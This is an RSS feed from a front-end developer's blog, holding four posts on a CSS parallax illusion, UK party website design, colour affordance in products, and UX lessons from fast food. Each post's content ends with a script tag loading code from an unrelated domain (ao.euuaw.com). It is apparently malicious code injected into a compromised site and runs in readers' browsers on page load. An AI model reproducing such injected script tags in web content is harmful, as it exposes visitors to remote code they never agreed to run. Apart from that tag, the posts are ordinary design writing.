<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Maban &#187; Design</title>
	<atom:link href="http://maban.co.uk/category/design/feed" rel="self" type="application/rss+xml" />
	<link>http://maban.co.uk</link>
	<description>Anna Debenham - Front End Developer</description>
	<lastBuildDate>Tue, 20 Jul 2010 20:58:44 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Parallax Illusion</title>
		<link></link>
		<comments>http://maban.co.uk/507#comments</comments>
		<pubDate>Mon, 12 Apr 2010 11:38:54 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[sandbox]]></category>
		<category><![CDATA[scanimation]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=507</guid>
		<description><![CDATA[
On Saturday, inspired by Paul Annett&#8217;s Channel 4 logo, I decided to build a parallax illusion in the browser.
Here&#8217;s the end result: http://maban.co.uk/sandbox/parallax-illusion/

How it works
To build this you only need 2 images. One is the stripes (mine is a 14&#215;8 gif where 6px are transparent, and 8 are black) and the main image which is [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-509" title="Parallax Illusion image" src="http://maban.co.uk/wp-content/uploads/2010/04/IMG_1001-300x225.jpg" alt="" width="240" height="180" /></p>
<p>On Saturday, inspired by <a href="http://nicepaul.com/">Paul Annett&#8217;s</a> <a href="http://4.nicepaul.com/">Channel 4 logo</a>, I decided to build a parallax illusion in the browser.</p>
<p>Here&#8217;s the end result: <a href="http://maban.co.uk/sandbox/parallax-illusion/">http://maban.co.uk/sandbox/parallax-illusion/</a></p>
<p><span id="more-507"></span></p>
<h3>How it works</h3>
<p>To build this you only need 2 images. One is the stripes (mine is a 14&#215;8 gif where 6px are transparent, and 8 are black) and the main image which is actually 2 images in 1 layered on top of each other.</p>
<p>The main image is a bird in 2 states &#8211; 1 with its wings up, 1 down. You can have more states, but I wanted to keep this very simple.</p>
<p>The stripes are a transparent, repeating background which appear over the image.</p>
<p>The stripes of the image that are visible need to be the same width as the gap between the stripes that go on top of it. So that the wings on the down state aren&#8217;t visible while it&#8217;s on the up state, you&#8217;ll need to position the blank stripes slightly differently on the down state, in this case 6px to the right of the ones on the up state. Then simply layer the two images on top of each other and save them as one image.</p>
<h4>The HTML:</h4>
<p><code>&lt;div class="image"&gt;<br />
&lt;div class="strips"&gt;&lt;/div&gt;<br />
&lt;/div&gt;</code></p>
<h4>The CSS:</h4>
<p><code>.strips {<br />
background-image:url("strips.gif");<br />
background-repeat:repeat;<br />
background-position:center center;<br />
height:100%;<br />
width:100%;<br />
}<br />
.image {<br />
background-image:url("background.gif");<br />
position:fixed;<br />
background-repeat:repeat-x;<br />
height:100%;<br />
width:100%;<br />
}</code></p>
<p>All this does is position the stripes over the image, and make both images the full height and width of the screen since there&#8217;s no content in them. The image stays in the same place while the stripes move with the width of the window because they are centred.</p>
<h3>More parallax illusions</h3>
<p>Paul Annett sent me a couple of links to parallax illusions he&#8217;d seen that other people have made: <a href="http://demo.marcofolio.net/a_parallax_illusion_with_css/">one of a horse running</a>, and <a href="http://demo.marcofolio.net/your_own_css_parallax_illusion/">one of a 3D object</a>.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/507/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Comparison of the UK&#8217;s political party websites</title>
		<link></link>
		<comments>http://maban.co.uk/442#comments</comments>
		<pubDate>Sun, 28 Mar 2010 20:35:48 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Reviews]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=442</guid>
		<description><![CDATA[Government and political party websites are some of the worst designed out there, which is a shame because they often have a lot of important information to communicate. Last year we saw how a strong online presence so positively benefited Obama&#8217;s campaign and won the inspiration of many young people, an audience the media claims [...]]]></description>
			<content:encoded><![CDATA[<p>Government and political party websites are some of the worst designed out there, which is a shame because they often have a lot of important information to communicate. Last year we saw how a strong online presence so positively benefited Obama&#8217;s campaign and won the inspiration of many young people, an audience the media claims to be disillusioned with politics. I wanted to see how each of the main UK party websites compared, so I&#8217;ve done a comparison of the design and code of 4 of them (plus an extra minor party for the lols).</p>
<p><span id="more-442"></span></p>
<p>Please note I dislike each party equally, so no bias intended.</p>
<p>You can click on the images to see them full size.</p>
<h2>Labour</h2>
<p>I had some great criticisms lined up for Labour&#8217;s website, but they redesigned it halfway through writing this post. It&#8217;s a vast improvement on the previous one, although the code is a disappointment.</p>
<h3>Design:</h3>
<p>I think the new design is ok (compared to the others). It&#8217;s consistent, clear and easy to read. Although the drop-down navigation doesn&#8217;t work when JavaScript is disabled, the pages still link to the subpages so it degrades nicely.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour.jpg"></a><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour3.jpg"><img class="aligncenter size-large wp-image-489" title="party-website-labour" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour3-1024x626.jpg" alt="Labour website screenshot" width="645" height="394" /></a></p>
<p style="text-align: left;">Most of the website responds well when the text size is increased, but there are a lot of elements with fixed heights, making it difficult or impossible to read. The links below from the policies section could have so easily be made to expand when the text gets bigger.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour-buttons.gif"><img class="aligncenter size-full wp-image-491" title="party-website-labour-buttons" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour-buttons.gif" alt="Labour party policy buttons" width="237" height="270" /></a></p>
<h3>Code</h3>
<p>The structure of the code is good, but the choice of id and class names very poor. Some of the <code>div</code> ids are prefixed by the word &#8220;div&#8221;. It&#8217;s completely unnecessary.  There are also lots of instances of <code>div_a</code>, <code>div_b</code>, <code>li id="a"</code>, <code>li id="b"</code>, <code>id="small-column-left"</code>, so not very semantic code. There are far too many ids. On any site, especially this size or being maintained by other people, it is far better to use classes over ids. Ids are for addressable content and cannot be reused more than once on the same page. Classes are much more flexible and achieve the same result.</p>
<h3>Overall impression</h3>
<p>I spent half an hour on their site, and I still don&#8217;t know what they stand for. Protecting front line services? Who doesn&#8217;t have this as a policy… Also, <a href="http://www.labour.org.uk/policies/crime-justice-and-immigration">longcat waffle like this isn&#8217;t helpful</a>, I want bulletpoints. Although they have a lot written about general areas such as the economy and healthcare, I still don&#8217;t really know where they stand on each policy. Every party is pro education, pro healthcare and pro jobs, but it&#8217;s the little things that I want to know about. In their policies section they have a search box where you can search their policies. I think this is a really nice idea, but I want to know where Labour stand on things like abortion and euthanasia, both things I couldn&#8217;t find when I searched on their site.</p>
<h2>Conservatives</h2>
<h3>Design</h3>
<p>The design isn&#8217;t bad, it doesn&#8217;t look as outdated as most. However, this is just the homepage. The inner pages look very different. (How appropriate). The secondary navigation, and even some of the design is inconsistent throughout the site, making the website that much more difficult to use.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-conservatives.jpg"><img class="aligncenter size-large  wp-image-474" title="party-website-conservatives" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-conservatives-1024x626.jpg" alt="Conservative party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>Classes are reused nicely, and the navigation has access keys. Severe case of divitus though and a lot of JavaScript.</p>
<h3>Overall impression</h3>
<p>I&#8217;m disappointed by what initially looked to be a semi-decent website. My main frustration was that so many of their policies and manifestos were downloadable PDFs or fancy page-flip Flash rather than HTML pages. It&#8217;s just lazy.</p>
<h2>Liberal Democrats</h2>
<h3>Design</h3>
<p>When I first visited this site, I thought this was it. Oh right, it&#8217;s a splash page. Hello 1998.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem.jpg"><img class="aligncenter size-large  wp-image-475" title="party-website-libdem" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem-1024x626.jpg" alt="Liberal Democrat party splashpage screenshot" width="645" height="394" /></a></p>
<p>You&#8217;ve got to have a little sympathy for the Lib dems for having the ugliest colour scheme &#8211; cyan and yellow. It&#8217;s very boxy and boring, and the photos are uninspiring. Mostly old men in suits wistfully pointing at things.</p>
<p>The big blue images with yellow text are repeated across the site, and often have really unhelpful alt text like <code>alt=""</code>. There&#8217;s a lot of visual clutter and cliché stock images.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem2.jpg"><img class="aligncenter size-large  wp-image-476" title="party-website-libdem2" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem2-1024x626.jpg" alt="Liberal Democrat party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>Every <code>div</code> has an id prefixed by the word &#8220;div&#8221;. And if that isn&#8217;t enough, nested within <code>#divTop</code>, we&#8217;ve got <code>#divTopLeft</code>, <code>#divTopCentre</code> and <code>#divTopRight</code>. And within <code>#divTopCentre</code> we&#8217;ve got <code>#divTopCentreTop</code> and <code>#divTopCentreBottom</code>. Blimey.</p>
<h3>Overall impression</h3>
<p>A really average site. The &#8220;what we stand for&#8221; navigation menu is useful, but there really is too much to look at on one page.</p>
<h2>Green</h2>
<h3>Design</h3>
<p>I&#8217;m personally not keen on the Green party&#8217;s website design. To me it feels like a hippy local newspaper site. It&#8217;s very blocky, things don&#8217;t align, and the link styles are too close to the normal text style.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-green.jpg"><img class="aligncenter size-large wp-image-477" title="party-website-green" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-green-1024x626.jpg" alt="Green party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>The code is along the same lines as the Lib dem website. Lots of unsemantic ids and classes like &#8220;left&#8221; and &#8220;right&#8221;. I don&#8217;t understand why they&#8217;ve bothered putting a &#8220;Validate XHTML&#8221; link on the site since it doesn&#8217;t actually validate.</p>
<h3>Overall impression</h3>
<p>I expected a little more from the Green party as they seem to be quite ahead with technology and are very popular with students. Saying that, their candidate MP <a href="http://www.carolinelucas.com">Caroline Lucas&#8217;s site</a> is really quite nice. I just wish they used that same style on the main site.</p>
<h2>British National Party</h2>
<p>I was going to avoid the BNP since I don&#8217;t consider them to be a proper political party, but their website is so ridiculous I thought I&#8217;d put them in here to win the wooden spoon award. If you haven&#8217;t heard of them, their policies are far-right, anti-immigration, anti foreign aid and pro capital punishment. Some public sector workforces such as the police ban membership from the party.</p>
<h3>Design</h3>
<p>It seems ironic that the BNP&#8217;s website is so similar *coughplagiarisedcough* to the Obama website.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp.jpg"><img class="aligncenter size-full wp-image-444" title="party-website-bnp" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp.jpg" alt="" width="634" height="388" /></a></p>
<p>The image on the left is the BNP website. The image on the right is Obama&#8217;s website. Hmmm…</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-obama.jpg"><img class="aligncenter size-full wp-image-450" title="party-website-bnp-obama" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-obama.jpg" alt="British National Party website screenshot" width="703" height="215" /></a></p>
<p>Have a closer look at the buttons. Drop shadows, reflections, bevels, stripes, gradients. Yep, these buttons have it all.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-buttons.jpg"> <img class="aligncenter size-full wp-image-462" title="party-website-bnp-buttons" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-buttons.jpg" alt="British National Party website buttons" width="214" height="230" /></a></p>
<p>I found this on their immigration policy website. Note the guy at the front with the <acronym title="Rocket Propelled Grenade">RPG</acronym>. Just a wild guess that this is photoshopped.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-banner.jpg"><img class="aligncenter size-medium wp-image-463" title="party-website-bnp-banner" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-banner-300x127.jpg" alt="British National Party website banner" width="300" height="127" /></a></p>
<h3>Code</h3>
<p>The site is a hybrid of divs, more divs, break tags and tables. The only heading level is an <code>h2</code>.</p>
<h3>Overall impression</h3>
<p>The design is completely ripped off and has a bad case of photoshop vomit. The code is average and needs more heading levels to be semantic. The navigation wraps onto 2 lines, and the site generally looks like it was designed in Microsoft Publisher.</p>
<h2>Summary</h2>
<p>Too many of the party sites only had a vague list of their policies. A shopping list style of policies with links to more information on each one would be very useful. And it&#8217;s not just education and healthcare that people care about. They want to know the things like whether their party is pro euthanasia, pro abortion or pro same sex marriage, but too many parties shy away from doing this in case it turns voters off. Vague lists are meaningless and only serve to confuse potential voters.</p>
<p>Considering the success of Obama&#8217;s political campaign which had such a strong online emphasis, I expected the UK politcal parties to respond by improving their online experiences, but they&#8217;re disappointingly behind. They may not have as big budgets, but it&#8217;s a very effective form of marketing when it&#8217;s done right.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/442/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Inspired by affordance on a vacuum cleaner</title>
		<link></link>
		<comments>http://maban.co.uk/373#comments</comments>
		<pubDate>Wed, 03 Feb 2010 17:38:08 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[affordance]]></category>
		<category><![CDATA[colour]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=373</guid>
		<description><![CDATA[I've been looking a lot at the use of colours in physical objects recently.  Often you're asked to work on a site where the brand colours are some hideous combination of yellow and blue or red and green, and you're expected to make those colours work well together.]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been looking a lot at the use of colours in physical objects recently.  Often you&#8217;re asked to work on a site where the brand colours are some hideous combination of yellow and blue or red and green, and you&#8217;re expected to make those colours work well together.<br />
<span id="more-373"></span><br />
<img src="http://maban.co.uk/wp-content/uploads/2010/02/dc16.jpg" alt="" title="dc16" width="280" height="280" class="alignleft size-full wp-image-374" />I watched a video about vacuum cleaners back when I was studying Product Design for A-Level, and the presenter was talking about the use of colour on the Dyson range.  The buttons and levers, the bits that you interact with, were designed to be a contrasting colour to the rest of the machine, and that instantly makes it so much more useable because it&#8217;s obvious which bits you interact with and which you don&#8217;t.</p>
<p>It&#8217;s frustrating when you try and interact with products that are beautiful to look at in the showroom, but difficult to use in their native environment.  Take television sets.  If you&#8217;re watching a film in the dark and want to turn the volume up, or change the channel without the remote, most of the time it&#8217;s impossible to tell which button does what because the corresponding symbol is such a low contrast to the background.  Give it a different colour or texture, and immediately it&#8217;s more usable.</p>
<p><img src="http://maban.co.uk/wp-content/uploads/2010/02/elevate_kitchen_tools_joseph_joseph-300x198.jpg" alt="" title="elevate_kitchen_tools_joseph_joseph" width="300" height="198" class="alignright size-medium wp-image-376" />With so much choice over what products we buy (that all do pretty much the same thing), the products that do things differently really stand out.  Take the Joseph utensil range.  It&#8217;s a spatula.  It doesn&#8217;t do anything that other spatulas can&#8217;t do, except it has a bit of plastic on the bottom that stops it touching the worksurface.  And that tiny bit of plastic makes it new, more human and desirable.  Also note the lime greens on the handles &#8211; the bits that you hold and interact with.</p>
<p>Next time you&#8217;re faced with a hideous colour scheme, ration those colours and use them as visual tools.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/373/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>User Experience on the web, fast food style</title>
		<link></link>
		<comments>http://maban.co.uk/26#comments</comments>
		<pubDate>Mon, 12 May 2008 00:02:14 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[ux]]></category>

		<guid isPermaLink="false">http://maban.co.uk/index.php/2008/05/12/user-experience-on-the-web-fast-food-style/</guid>
		<description><![CDATA[In this year&#8217;s Future of Web Design conference, Andy Budd gave a fantastic talk comparing User Experience on websites with the hotel industry.  He described the need for a good first impression, and the importance of going the extra mile to make the customer feel comfortable and ultimately leave with a good impression.
I worked [...]]]></description>
			<content:encoded><![CDATA[<p>In this year&#8217;s Future of Web Design conference, <a href="http://www.andybudd.com/" target="_blank">Andy Budd</a> gave a fantastic talk comparing User Experience on websites with the hotel industry.  He described the need for a good first impression, and the importance of going the extra mile to make the customer feel comfortable and ultimately leave with a good impression.</p>
<p>I worked for almost 2 years in the fast food industry, albeit making and serving fruit smoothies.  Although this could be described as a huge contrast to the hotel industry, I think there are still a lot of similarities because they both rely on good User Experience.  The main difference between the User Experience in a hotel and in a fast food restaurant is customer expectations.  In a fast food place, customers don&#8217;t expect to be served a gourmet meal in less than 5 minutes.  They understand that they may have to queue for a short while, that the tables won&#8217;t have tablecloths, will probably be a bit sticky and the cutlery will be made of plastic because they don&#8217;t have to pay as much.  But customers are usually willing to pay more for exactly the same thing, but where they&#8217;ll get better customer service.</p>
<p>Here are a few tips I&#8217;ve learned from my experience of the fast food industry that can be applied to the web.</p>
<p><span id="more-26"></span></p>
<h3>1. Greet the customer in a friendly manner, because first impressions count</h3>
<p>One of the problems with fast food restaurants is their poor reputation.  I can think of many occasions when I&#8217;ve been served by someone who clearly hates their job, and this has given me a negative representation of the company.  Then the food takes a long time to make, and you&#8217;re left assuming they&#8217;re slow because they&#8217;re being lazy (or are busy spitting in your food).</p>
<p>But imagine being served by someone who pleasantly greets you with a smile, is helpful in taking your order, and clearly loves their job.  You&#8217;d feel a little more understanding if it took a little longer to make.  You may even think it&#8217;s because they&#8217;re putting extra effort into making your food better.</p>
<p>It&#8217;s the little things that help improve the overall experience.  The environment is pleasant and clean, the atmosphere is friendly, the food has been prepared nicely.  All these things are easy to implement, and work together to enhance the customer experience, but they&#8217;re not enough on their own.</p>
<p>Going somewhere new can feel a bit scary, so reassuring the customer that they are in a safe place as soon as they walk through the door is the first step.  You might feel this reassurance on sites where the language used is friendly and appropriate.  Or on a site where there are lots of places to look for help if you get stuck, such as video tutorials, troubleshooting and frequently asked questions.</p>
<p>Food is a personal thing, and customers generally like being able to see it being made.  It&#8217;s unlikely they&#8217;d want to see the back-end of your website, but again, reassuring them that something is happening while they&#8217;re waiting is a good idea.  Perhaps when submitting an order, there&#8217;s a little loading bar explaining that the order is being processed (rather than a blank page where you&#8217;re left wondering what to do next).</p>
<h3>2. Educate the customer, as it may be the first time they&#8217;ve been here</h3>
<p>Most fast-food restaurants expect that the customer has been to the place before and knows the ordering process.   You know to queue up at the counter, select a meal from the menu board, read it out to the person on till who will punch it into his screen.  You then pay them, stand to one side and assume that your food is being cooked.  Once the food is ready, the food order will be called out, and you step forward and collect it.  On your way to your table, you might take some napkins, plastic forks, ketchup and straws.  You then eat your meal, and when finished, you empty your rubbish into the bin, stack your tray and leave.</p>
<p>Every step in this process requires the customer&#8217;s previous knowledge of what to do. However, this process can vary depending on the company.  Some expect you to clear your own table.  Other will clear your table for you.  Some will expect you to stand to one side while they get your food ready, others will give it to you while you&#8217;re still standing there.  The customer knows that each chain is different, so the first time they go into a new fast-food restaurant, they need reassurance.  If they have a bad experience the first time, they&#8217;ll probably assume it will be like that every time and will go elsewhere because there is plenty of choice.  (Sound familiar?)</p>
<p>Giving the customer clear signals of what to do at each step is essential to reduce confusion.  Never assume that they&#8217;ll know what to do.  They may be scared to make a mistake, or if they do make a mistake (such as trying to order the breakfast menu in the evening), they&#8217;ll feel foolish.  You don&#8217;t want customers to feel foolish, you want them to feel in control.</p>
<p>When designing a site, make it clear to the user what the process is.  You might do this by listing the navigation in the order of the process.  You want to make it clear what the purpose of the site is, what the page they are on will tell them (without them having to read all the way through it), and guide the user through the process along the way.  If they make a mistake, don&#8217;t punish them or make them feel bad.  Just tell them exactly what they should do in a friendly manner.</p>
<h3>3. The customer is always right, even when they&#8217;re not</h3>
<p>It is often the case in a fast food restaurant that you must say your order exactly as it says on the menu board.  For example, you may order a cheeseburger, but instead call it &#8220;a meat patty with a slice of cheese and some gherkins between two pieces of bread&#8221;.  This will undoubtedly baffle the person serving you, who is used to hearing the ridiculous company names given to each burger, even for just a moment.</p>
<p>If we were to compare the fast food order process to a web form, the same is true.  When inputting a postcode, card number or telephone number into a form, some don&#8217;t accept the field if the customer puts a space between the characters.  When searching for something on the site, the search term the visitor uses may be different to what you&#8217;d expect.  In such a culturally diverse environment, it&#8217;s important to take into account that users don&#8217;t always ask for or do things in the way you&#8217;d expect.</p>
<h3>4. Listen to the customer&#8217;s feedback, and be sympathetic</h3>
<p>Even experienced fast food customers can get it wrong if the restaurant does things slightly differently to the way they&#8217;re used to.  For example where I worked, sometimes customers would ask for ingredients not in the menu that they&#8217;d seen in other smoothie bars.  They were sometimes upset that I couldn&#8217;t give them what they wanted.</p>
<p>In cases such as these, it is not always possible to satisfy the customer&#8217;s expectations every time.  But by showing the customer that you understand their wishes, and making them understand that you value their feedback and will take it into account, they are often more appreciative of the situation.  It may be the case that you&#8217;re missing out on a gap in the market that customers&#8217; suggestions help you find.</p>
<p>A feedback form on a website is a good way to say to the customer that you care about what they think.  However, make sure there is someone who can reply to this to let the visitor know that their comments have been acknowledged.  Maybe a customer searches for something on your site but the results say nothing could be found.  Make sure you have a message explaining that you&#8217;re sorry that the term could not be found on the site, and give them someone to contact who may be able to find the information they&#8217;re looking for.</p>
<h3>5. Make the most of a bad situation, it&#8217;s an opportunity in disguise</h3>
<p>One of the most surprising things I&#8217;ve learnt is that if you come across a situation that is out of your control, what you do to overcome the situation affects the customer&#8217;s perception of your brand more than the actual event.</p>
<p>One day at work, we had a powercut halfway through making a customer&#8217;s drink.  We could not carry on making the drink because the machines wouldn&#8217;t work, and we couldn&#8217;t refund them because the till wouldn&#8217;t open.  So we asked for where they&#8217;d be that morning (luckily they worked in an office nearby) and promised we&#8217;d bring them their drink as soon as the power came back on.  When it did, we made their drink and I ran it to their office to give it to them personally.  The customer was genuinely touched by our efforts, and his colleagues seemed impressed too.</p>
<p>A fast food restaurant may not be the most glamorous place to eat, but with with just a little effort, it is possible to get the customer to leave very happy and come back regularly.  I wish I could make glamorous hotel style <a href="http://www.andybudd.com/" target="_blank">Andy Budd</a> websites with clever code ticking away in the background, but I&#8217;m not at this level yet.  I may only be able to make simple sites at the moment, but I can aim to create good User Experiences for the people that use them.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/26/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
